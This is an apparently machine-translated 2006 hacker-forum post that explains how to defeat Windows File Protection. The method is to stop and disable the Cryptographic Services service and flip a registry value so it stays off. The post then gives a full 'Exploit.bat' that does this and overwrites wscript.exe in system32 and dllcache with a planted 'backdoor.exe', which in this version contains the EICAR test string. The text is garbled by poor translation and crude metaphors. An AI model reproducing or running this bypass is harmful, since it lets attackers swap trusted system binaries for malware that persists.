Cut WFP's JJ easily [allyesno]

Author: allyesno

Team: freexploit

Date: 2006-01-20

I spent a lot of time writing articles that bypassed WFP protection last night. It turned out to be wrong. I felt very uncomfortable. I decided to challenge WFP again.

The thief first captured the king and the snake was about to take a 7-inch, so as long as we caught the small JJ of WFP, it would not be able to erect.

Who is the small JJ of WFP?

Reference:

This protection mechanism is triggered when WFP receives a Directory change notification for the files in the protected directory. After receiving this notification, WFP determines the file to be changed. If this file is a protected file, WFP searches for the file signature in the directory file to check whether the new file version is correct. If the version of this file is incorrect, WFP replaces the new file with the files in the cache folder (if the file is in the cache folder) or the files in the installation source.

The small JJ of WFP is a directory file castrated. Basically, WFP is a waste of people.

How can we caster it? Please refer to the sunflower collection (msdn). to practice magic, you must first go to the palace. We know that there is a service in Windows called cryptographic services.

The role of this service is

Reference:

Three management services are provided: the database catalog service, which determines the signatures of Windows files; the Protected Root Service, which adds and deletes the certificates of the Trusted Root Certificate Authority from this computer; and key service, which helps you register this computer to obtain a certificate. If this service is terminated, these management services cannot run properly. If this service is disabled, any service dependent on it cannot be started.

You can stop the service by killing it. net stop. Since the service is automatically enabled after the computer is restarted, SC is used to disable it.

Important Supplement:

XP SP2 and 2 k tests by luoluo

[16: 57] <luoluo> CS is cryptsvc. dll
[16: 58] <luoluo> run in svchost mode in Win XP
[] <Luoluo> This module can be found in the services process in Win 2000

Important addition:

After repeated tests, we found that the CS service and several features of WFP will be automatically enabled after the first shutdown.

(CS will not be automatically enabled after repeated start and stop)

So I think this is why envymask is testing in the pop-up box.

There are two solutions:

1. Use the replacement service proposed by luoluo to replace the CS service with other services, so the check function cannot be enabled even if the CS is started again.

2. Modify the Registry HKEY_LOCAL_MACHINE/system/controlset001/hardware profiles/0001/system/CurrentControlSet/Enum/root/legacy_cryptsvc/0000

0 is enabled
1 is disabled

To completely eliminate the CS service, we set the value to 1.

WFP only calls the CS service to detect the system files when they are deleted or replaced.

After the CS service is completed, the system file will not be changed when the CS service WFP is started again after the system file is deleted or replaced.

Therefore, WFP monitoring is dynamic.

Write a bat program to implement test pass in Win 2003.

Exploit. bat

Reference:

@ Echo off Rem cheat WFP check by allyesno Rem my site: http://blog.donews.com/allyesno/ Rem my email: shellget@hotmail.com Echo plz waiting net stop to stop Net stop "Cryptographic Services" Echo. Echo plz waiting SC config this service SC config "cryptsvc" Start = disabled Echo x5o! P % @ AP [4/pzx54 (P ^) 7cc) 7} $ EICAR-STANDARD-ANTIVIRUS-TEST-FILE! $ H + H *> % SystemRoot %/system32/dllcache/backdoor.exe Echo copy/Y % SystemRoot %/system32/dllcache/wscript.exe % SystemRoot %/system32/dllcache/wscript.exe. Bak Copy/Y % SystemRoot %/system32/dllcache/wscript.exe % SystemRoot %/system32/dllcache/wscript.exe. Bak Echo copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/dllcache/wscript.exe Copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/dllcache/wscript.exe Echo copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/wscript.exe Copy/Y % SystemRoot %/system32/dllcache/backdoor.exe % SystemRoot %/system32/wscript.exe Echo yeah we finished our work Echo check the % SystemRoot %/system32/wscript.exe by Dir Echo n u C the file size, good luck test by allyesno in win2003 n WINXP OS Echo THX: Heze, envymask, 10, luoluo 4 Test

My site: http://blog.donews.com/allyesno/

My email: shellget@hotmail.com (only receive text-only mail)

Thank you very much for the testing results of zex and envymask in win2003 and 10 in 2 K.

Supplement to the replacement service proposed by luoluo and testing in XP SP2

References:

Http://www.microsoft.com/china/winlogo/policies/signature-benefits.asp

Http://support.microsoft.com/default.aspx? SCID = KB; ZH-CN; 222193

Http://support.microsoft.com/default.aspx? SCID = KB; ZH-tw; 282784

Http://support.microsoft.com/default.aspx? SCID = KB; ZH-CN; 222193

Attachment: exploit.rar [required0Community meta download]
This file has been downloaded 11 times.

..................
Reference:

Phantom Group Phantom water 14335770 Pst project 16385798 IRC chat room Irc.0x557.org + 9940 (SSL) # ph4nt0m # segfault Xfocus.org + 61111 (SSL) # sigxfocus

 

Last edited by allyesno at pm